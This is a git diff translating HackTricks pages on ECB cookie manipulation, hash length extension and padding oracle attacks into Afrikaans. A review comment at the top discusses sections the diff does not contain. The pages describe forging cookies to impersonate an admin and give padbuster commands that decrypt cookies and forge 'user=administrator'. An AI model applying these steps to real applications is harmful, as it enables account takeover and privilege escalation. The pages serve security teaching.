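Review bot: the "### XXKoder" section gains an English paragraph that is not in the source file and is inaccurate: XXEncode is a binary-to-text encoding in the uuencode family (the sample `begin 644 webutils_pl ... end` block shows exactly that), not a conversion of ASCII characters to hexadecimal. A translation PR should not add descriptive text, so this paragraph should go, as should the new BinHex and ASCII85 paragraphs, which likewise have no counterpart in the original. In the A1Z26 section "Briewe na hul numeriese waarde" uses the postal sense of "letters"; "Letters na hul numeriese waarde" is the alphabet sense meant. The Dvorak link's query string is changed from `lang=en` to `lang=af`; external tool URLs should stay as in the source. Under Fernet, "2 basis64 strings" should keep "base64" as the encoding name. Finally, the blank lines the source keeps between each heading or sentence and its fenced code block are stripped throughout this hunk for no translation reason; keep the source's spacing.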
@@ -304,7 +281,7 @@ A secret is splitted in X parts and to recover it you need Y parts (_Y <=X_). * [https://github.com/glv2/bruteforce-salted-openssl](https://github.com/glv2/bruteforce-salted-openssl) * [https://github.com/carlospolop/easy\_BFopensslCTF](https://github.com/carlospolop/easy\_BFopensslCTF) -## Tools +## Gereedskap * [https://github.com/Ganapati/RsaCtfTool](https://github.com/Ganapati/RsaCtfTool) * [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom) @@ -312,14 +289,14 @@ A secret is splitted in X parts and to recover it you need Y parts (_Y <=X_).
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/cryptography/electronic-code-book-ecb.md b/cryptography/electronic-code-book-ecb.md index 4ddaf5d47..294c9ddc3 100644 --- a/cryptography/electronic-code-book-ecb.md +++ b/cryptography/electronic-code-book-ecb.md @@ -1,104 +1,94 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
# ECB -(ECB) Electronic Code Book - symmetric encryption scheme which **replaces each block of the clear text** by the **block of ciphertext**. It is the **simplest** encryption scheme. The main idea is to **split** the clear text into **blocks of N bits** (depends on the size of the block of input data, encryption algorithm) and then to encrypt (decrypt) each block of clear text using the only key. +(ECB) Elektroniese Kodeboek - simmetriese enkripsieskema wat elke blok van die duidelike teks vervang deur die blok van die sleutelteks. Dit is die eenvoudigste enkripsieskema. Die hoofidee is om die duidelike teks in blokke van N-bits (afhangende van die grootte van die blok van insetdata, enkripsie-algoritme) te verdeel en dan elke blok van duidelike teks te enkripteer (de-enkripteer) met die enigste sleutel. ![](https://upload.wikimedia.org/wikipedia/commons/thumb/e/e6/ECB_decryption.svg/601px-ECB_decryption.svg.png) -Using ECB has multiple security implications: +Die gebruik van ECB het verskeie veiligheidsimplikasies: -* **Blocks from encrypted message can be removed** -* **Blocks from encrypted message can be moved around** +* **Blokke van die enkripteerde boodskap kan verwyder word** +* **Blokke van die enkripteerde boodskap kan rondgeskuif word** -# Detection of the vulnerability +# Opname van die kwesbaarheid -Imagine you login into an application several times and you **always get the same cookie**. This is because the cookie of the application is **`|`**.\ -Then, you generate to new users, both of them with the **same long password** and **almost** the **same** **username**.\ -You find out that the **blocks of 8B** where the **info of both users** is the same are **equals**. Then, you imagine that this might be because **ECB is being used**. - -Like in the following example. 
Observe how these** 2 decoded cookies** has several times the block **`\x23U\xE45K\xCB\x21\xC8`** +Stel jou voor jy teken verskeie kere in by 'n toepassing en jy kry **altyd dieselfde koekie**. Dit is omdat die koekie van die toepassing **`|`** is.\ +Dan genereer jy twee nuwe gebruikers, albei met dieselfde lang wagwoord en **byna** dieselfde **gebruikersnaam**.\ +Jy kom agter dat die blokke van 8B waar die inligting van beide gebruikers dieselfde is, **gelyk** is. Jy vermoed dat dit dalk is omdat **ECB gebruik word**. +Soos in die volgende voorbeeld. Let op hoe hierdie **2 gedekodeerde koekies** verskeie kere die blok **`\x23U\xE45K\xCB\x21\xC8`** bevat. ``` \x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9 \x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9 ``` +Dit is omdat die **gebruikersnaam en wagwoord van daardie koekies verskeie kere die letter "a" bevat het** (byvoorbeeld). Die **blokke** wat **verskillend** is, is blokke wat **ten minste 1 verskillende karakter** bevat het (miskien die skeidingsteken "|" of 'n nodige verskil in die gebruikersnaam). -This is because the **username and password of those cookies contained several times the letter "a"** (for example). The **blocks** that are **different** are blocks that contained **at least 1 different character** (maybe the delimiter "|" or some necessary difference in the username). +Nou hoef die aanvaller net te ontdek of die formaat `` of `` is. Om dit te doen, kan hy net **verskeie gebruikersname genereer** met **soortgelyke en lang gebruikersname en wagwoorde** totdat hy die formaat en die lengte van die skeidingsteken vind: -Now, the attacker just need to discover if the format is `` or ``. 
For doing that, he can just **generate several usernames **with s**imilar and long usernames and passwords until he find the format and the length of the delimiter:** +| Lengte van gebruikersnaam: | Lengte van wagwoord: | Lengte van gebruikersnaam+wagwoord: | Lengte van koekie (na dekodeering): | +| ------------------------- | -------------------- | ----------------------------------- | ----------------------------------- | +| 2 | 2 | 4 | 8 | +| 3 | 3 | 6 | 8 | +| 3 | 4 | 7 | 8 | +| 4 | 4 | 8 | 16 | +| 7 | 7 | 14 | 16 | -| Username length: | Password length: | Username+Password length: | Cookie's length (after decoding): | -| ---------------- | ---------------- | ------------------------- | --------------------------------- | -| 2 | 2 | 4 | 8 | -| 3 | 3 | 6 | 8 | -| 3 | 4 | 7 | 8 | -| 4 | 4 | 8 | 16 | -| 7 | 7 | 14 | 16 | +# Uitbuiting van die kwesbaarheid -# Exploitation of the vulnerability - -## Removing entire blocks - -Knowing the format of the cookie (`|`), in order to impersonate the username `admin` create a new user called `aaaaaaaaadmin` and get the cookie and decode it: +## Verwydering van hele blokke +Met kennis van die formaat van die koekie (`|`), om die gebruikersnaam `admin` na te boots, skep 'n nuwe gebruiker genaamd `aaaaaaaaadmin` en kry die koekie en dekodeer dit: ``` \x23U\xE45K\xCB\x21\xC8\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 ``` - -We can see the pattern `\x23U\xE45K\xCB\x21\xC8` created previously with the username that contained only `a`.\ -Then, you can remove the first block of 8B and you will et a valid cookie for the username `admin`: - +Ons kan die patroon `\x23U\xE45K\xCB\x21\xC8` sien wat vantevore geskep is met die gebruikersnaam wat slegs `a` bevat.\ +Daarna kan jy die eerste blok van 8B verwyder en jy sal 'n geldige koekie vir die gebruikersnaam `admin` kry: ``` \xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 ``` +## Blokke skuif -## Moving blocks +In baie databasisse is dit dieselfde om te soek vir `WHERE username='admin';` of vir `WHERE 
username='admin ';` _(Let op die ekstra spasies)_ -In many databases it is the same to search for `WHERE username='admin';` or for `WHERE username='admin ';` _(Note the extra spaces)_ +Dus, 'n ander manier om die gebruiker `admin` na te boots, sou wees om: -So, another way to impersonate the user `admin` would be to: +* Genereer 'n gebruikersnaam wat: `len() + len(` 2 blokke van 8Bs genereer. +* Genereer dan 'n wagwoord wat 'n presiese aantal blokke vul wat die gebruikersnaam bevat wat ons wil na boots, en spasies, soos: `admin ` -* Generate a username that: `len() + len(` will generate 2 blocks of 8Bs. -* Then, generate a password that will fill an exact number of blocks containing the username we want to impersonate and spaces, like: `admin ` +Die koekie van hierdie gebruiker sal bestaan uit 3 blokke: die eerste 2 is die blokke van die gebruikersnaam + delimiter en die derde een van die wagwoord (wat die gebruikersnaam naboots): `username |admin ` -The cookie of this user is going to be composed by 3 blocks: the first 2 is the blocks of the username + delimiter and the third one of the password (which is faking the username): `username |admin ` +**Vervang dan net die eerste blok met die laaste keer en jy boots die gebruiker `admin` na: `admin |username`** -**Then, just replace the first block with the last time and will be impersonating the user `admin`: `admin |username`** - -## References +## Verwysings * [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)](http://cryptowiki.net/index.php?title=Electronic_Code_Book_\(ECB\))
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
- - diff --git a/cryptography/hash-length-extension-attack.md b/cryptography/hash-length-extension-attack.md index 59c28f7cf..1c86ca9e3 100644 --- a/cryptography/hash-length-extension-attack.md +++ b/cryptography/hash-length-extension-attack.md @@ -1,66 +1,62 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-# Summary of the attack +# Opsomming van die aanval -Imagine a server which is **signing** some **data** by **appending** a **secret** to some known clear text data and then hashing that data. If you know: +Stel jou voor 'n bediener wat 'n paar **data** onderteken deur 'n **geheim** by 'n bekende teksdata te **voeg** en dan daardie data te hash. As jy weet: -* **The length of the secret** (this can be also bruteforced from a given length range) -* **The clear text data** -* **The algorithm (and it's vulnerable to this attack)** -* **The padding is known** - * Usually a default one is used, so if the other 3 requirements are met, this also is - * The padding vary depending on the length of the secret+data, that's why the length of the secret is needed +* **Die lengte van die geheim** (dit kan ook gekraak word binne 'n gegewe lengtebereik) +* **Die duidelike teksdata** +* **Die algoritme (en dit is vatbaar vir hierdie aanval)** +* **Die opvulling is bekend** +* Gewoonlik word 'n verstek een gebruik, so as die ander 3 vereistes voldoen word, is dit ook die geval +* Die opvulling varieer afhangende van die lengte van die geheim+data, daarom is die lengte van die geheim nodig -Then, it's possible for an **attacker** to **append** **data** and **generate** a valid **signature** for the **previos data + appended data**. +Dan is dit moontlik vir 'n **aanvaller** om **data** by te voeg en 'n geldige **handtekening** te genereer vir die **vorige data + bygevoegde data**. -## How? +## Hoe? -Basically the vulnerable algorithms generate the hashes by firstly **hashing a block of data**, and then, **from** the **previously** created **hash** (state), they **add the next block of data** and **hash it**. +Basies genereer die vatbare algoritmes die hasings deur eerstens 'n blok data te hash, en dan, **van** die **voorheen** geskep **hash** (toestand), voeg hulle die volgende blok data by en hash dit. 
-Then, imagine that the secret is "secret" and the data is "data", the MD5 of "secretdata" is 6036708eba0d11f6ef52ad44e8b74d5b.\ -If an attacker wants to append the string "append" he can: +Stel jou voor dat die geheim "geheim" is en die data "data" is, die MD5 van "geheimdata" is 6036708eba0d11f6ef52ad44e8b74d5b.\ +As 'n aanvaller die string "byvoeg" wil byvoeg, kan hy: -* Generate a MD5 of 64 "A"s -* Change the state of the previously initialized hash to 6036708eba0d11f6ef52ad44e8b74d5b -* Append the string "append" -* Finish the hash and the resulting hash will be a **valid one for "secret" + "data" + "padding" + "append"** +* Genereer 'n MD5 van 64 "A"s +* Verander die toestand van die voorheen geïnisialiseerde hash na 6036708eba0d11f6ef52ad44e8b74d5b +* Voeg die string "byvoeg" by +* Voltooi die hash en die resulterende hash sal 'n **geldige een wees vir "geheim" + "data" + "opvulling" + "byvoeg"** -## **Tool** +## **Hulpmiddel** {% embed url="https://github.com/iagox86/hash_extender" %} -## References +## Verwysings -You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) +Jy kan hierdie aanval goed verduidelik vind by [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/cryptography/padding-oracle-priv.md b/cryptography/padding-oracle-priv.md index 4a5994b5c..28cb96ab0 100644 --- a/cryptography/padding-oracle-priv.md +++ b/cryptography/padding-oracle-priv.md @@ -1,38 +1,36 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
# CBC - Cipher Block Chaining -In CBC mode the **previous encrypted block is used as IV** to XOR with the next block: +In CBC-modus word die **vorige versleutelde blok as IV** gebruik om te XOR met die volgende blok: ![https://defuse.ca/images/cbc\_encryption.png](https://defuse.ca/images/cbc\_encryption.png) -To decrypt CBC the **opposite** **operations** are done: +Om CBC te ontsluit, word die **teenoorgestelde** **bewerkings** gedoen: ![https://defuse.ca/images/cbc\_decryption.png](https://defuse.ca/images/cbc\_decryption.png) -Notice how it's needed to use an **encryption** **key** and an **IV**. +Let daarop dat 'n **versleutelingsleutel** en 'n **IV** gebruik moet word. -# Message Padding +# Boodskapvulling -As the encryption is performed in **fixed** **size** **blocks**, **padding** is usually needed in the **last** **block** to complete its length.\ -Usually **PKCS7** is used, which generates a padding **repeating** the **number** of **bytes** **needed** to **complete** the block. For example, if the last block is missing 3 bytes, the padding will be `\x03\x03\x03`. +Aangesien die versleuteling in **vasgestelde** **blokke** **uitgevoer** word, word **vulling** gewoonlik in die **laaste** **blok** benodig om sy lengte te voltooi.\ +Gewoonlik word **PKCS7** gebruik, wat 'n vulling genereer wat die **aantal** **byte** **benodig** om die blok te voltooi, **herhaal**. Byvoorbeeld, as die laaste blok 3 byte kortkom, sal die vulling `\x03\x03\x03` wees. -Let's look at more examples with a **2 blocks of length 8bytes**: +Kom ons kyk na meer voorbeelde met 'n **2 blokke van 8 byte**: | byte #0 | byte #1 | byte #2 | byte #3 | byte #4 | byte #5 | byte #6 | byte #7 | byte #0 | byte #1 | byte #2 | byte #3 | byte #4 | byte #5 | byte #6 | byte #7 | | ------- | ------- | ------- | ------- | ------- | ------- | ------- | ------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- | 
@@ -41,51 +39,43 @@ Let's look at more examples with a **2 blocks of length 8bytes**: | P | A | S | S | W | O | R | D | 1 | 2 | 3 | **0x05** | **0x05** | **0x05** | **0x05** | **0x05** | | P | A | S | S | W | O | R | D | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | -Note how in the last example the **last block was full so another one was generated only with padding**. +Let daarop hoe in die laaste voorbeeld die **laaste blok vol was, dus is nog een gegenereer slegs met vulling**. # Padding Oracle -When an application decrypts encrypted data, it will first decrypt the data; then it will remove the padding. During the cleanup of the padding, if an **invalid padding triggers a detectable behaviour**, you have a **padding oracle vulnerability**. The detectable behaviour can be an **error**, a **lack of results**, or a **slower response**. +Wanneer 'n toepassing versleutelde data ontsluit, sal dit eers die data ontsluit; dan sal dit die vulling verwyder. Tydens die skoonmaak van die vulling, as 'n **ongeldige vulling 'n waarneembare gedrag teweegbring**, het jy 'n **padding-orakel kwesbaarheid**. Die waarneembare gedrag kan 'n **fout**, 'n **gebrek aan resultate**, of 'n **stadiger reaksie** wees. -If you detect this behaviour, you can **decrypt the encrypted data** and even **encrypt any cleartext**. +As jy hierdie gedrag opspoor, kan jy die **versleutelde data ontsluit** en selfs **enige duidelike teks versleutel**. 
-## How to exploit - -You could use [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) to exploit this kind of vulnerability or just do +## Hoe om uit te buit +Jy kan [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) gebruik om hierdie tipe kwesbaarheid uit te buit of net die volgende doen ``` sudo apt-get install padbuster ``` - -In order to test if the cookie of a site is vulnerable you could try: - +Om te toets of die koekie van 'n webwerf kwesbaar is, kan jy probeer: ```bash perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA==" ``` +**Kodering 0** beteken dat **base64** gebruik word (maar ander is beskikbaar, kyk na die hulpmenu). -**Encoding 0** means that **base64** is used (but others are available, check the help menu). - -You could also **abuse this vulnerability to encrypt new data. For example, imagine that the content of the cookie is "**_**user=MyUsername**_**", then you may change it to "\_user=administrator\_" and escalate privileges inside the application. You could also do it using `paduster`specifying the -plaintext** parameter: - +Jy kan ook **misbruik maak van hierdie kwesbaarheid om nuwe data te enkripteer. Byvoorbeeld, stel jou voor dat die inhoud van die koekie is "**_**gebruiker=MyGebruikersnaam**_**", dan kan jy dit verander na "\_gebruiker=administrateur\_" en voorregte binne die toepassing verhoog. Jy kan dit ook doen deur `paduster` te gebruik en die -plaintext** parameter te spesifiseer: ```bash perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA==" -plaintext "user=administrator" ``` - -If the site is vulnerable `padbuster`will automatically try to find when the padding error occurs, but you can also indicating the error message it using the **-error** parameter. 
- +As die webwerf kwesbaar is, sal `padbuster` outomaties probeer om te vind wanneer die padding-fout plaasvind, maar jy kan ook die foutboodskap aandui deur die **-error** parameter te gebruik. ```bash perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon=RVJDQrwUdTRWJUVUeBKkEA==" -error "Invalid padding" ``` +## Die teorie -## The theory - -In **summary**, you can start decrypting the encrypted data by guessing the correct values that can be used to create all the **different paddings**. Then, the padding oracle attack will start decrypting bytes from the end to the start by guessing which will be the correct value that **creates a padding of 1, 2, 3, etc**. +In **opsomming**, jy kan begin om die versleutelde data te ontsluit deur die regte waardes te raai wat gebruik kan word om al die **verskillende opvullings** te skep. Dan sal die padding-orakelaanval begin om byte van die einde na die begin te ontsluit deur te raai watter die regte waarde sal wees wat **'n opvulling van 1, 2, 3, ens. skep**. ![](<../.gitbook/assets/image (629) (1) (1).png>) -Imagine you have some encrypted text that occupies **2 blocks** formed by the bytes from **E0 to E15**.\ -In order to **decrypt** the **last** **block** (**E8** to **E15**), the whole block passes through the "block cipher decryption" generating the **intermediary bytes I0 to I15**.\ -Finally, each intermediary byte is **XORed** with the previous encrypted bytes (E0 to E7). So: +Stel jou voor jy het 'n paar versleutelde teks wat **2 blokke** beslaan, gevorm deur die bytes van **E0 tot E15**.\ +Om die **laaste blok** (**E8** tot **E15**) te **ontsluit**, gaan die hele blok deur die "blok-sifer ontsluiting" wat die **tussengangerbyte I0 tot I15** genereer.\ +Uiteindelik word elke tussengangerbyte **XORed** met die vorige versleutelde bytes (E0 tot E7). So: * `C15 = D(E15) ^ E7 = I15 ^ E7` * `C14 = I14 ^ E6` 
@@ -93,44 +83,42 @@ Finally, each intermediary byte is **XORed** with the previous encrypted bytes ( * `C12 = I12 ^ E4` * ... -Now, It's possible to **modify `E7` until `C15` is `0x01`**, which will also be a correct padding. So, in this case: `\x01 = I15 ^ E'7` +Nou is dit moontlik om **`E7` te wysig totdat `C15` `0x01` is**, wat ook 'n korrekte opvulling sal wees. Dus, in hierdie geval: `\x01 = I15 ^ E'7` -So, finding E'7, it's **possible to calculate I15**: `I15 = 0x01 ^ E'7` +Dus, deur E'7 te vind, is dit **moontlik om I15 te bereken**: `I15 = 0x01 ^ E'7` -Which allow us to **calculate C15**: `C15 = E7 ^ I15 = E7 ^ \x01 ^ E'7` +Dit stel ons in staat om **C15 te bereken**: `C15 = E7 ^ I15 = E7 ^ \x01 ^ E'7` -Knowing **C15**, now it's possible to **calculate C14**, but this time brute-forcing the padding `\x02\x02`. +Wetende **C15**, is dit nou moontlik om **C14 te bereken**, maar hierdie keer deur die opvulling `\x02\x02` te kragtig te raai. -This BF is as complex as the previous one as it's possible to calculate the the `E''15` whose value is 0x02: `E''7 = \x02 ^ I15` so it's just needed to find the **`E'14`** that generates a **`C14` equals to `0x02`**.\ -Then, do the same steps to decrypt C14: **`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`** +Hierdie BF is net so ingewikkeld as die vorige een, omdat dit moontlik is om die `E''15` te bereken, waarvan die waarde 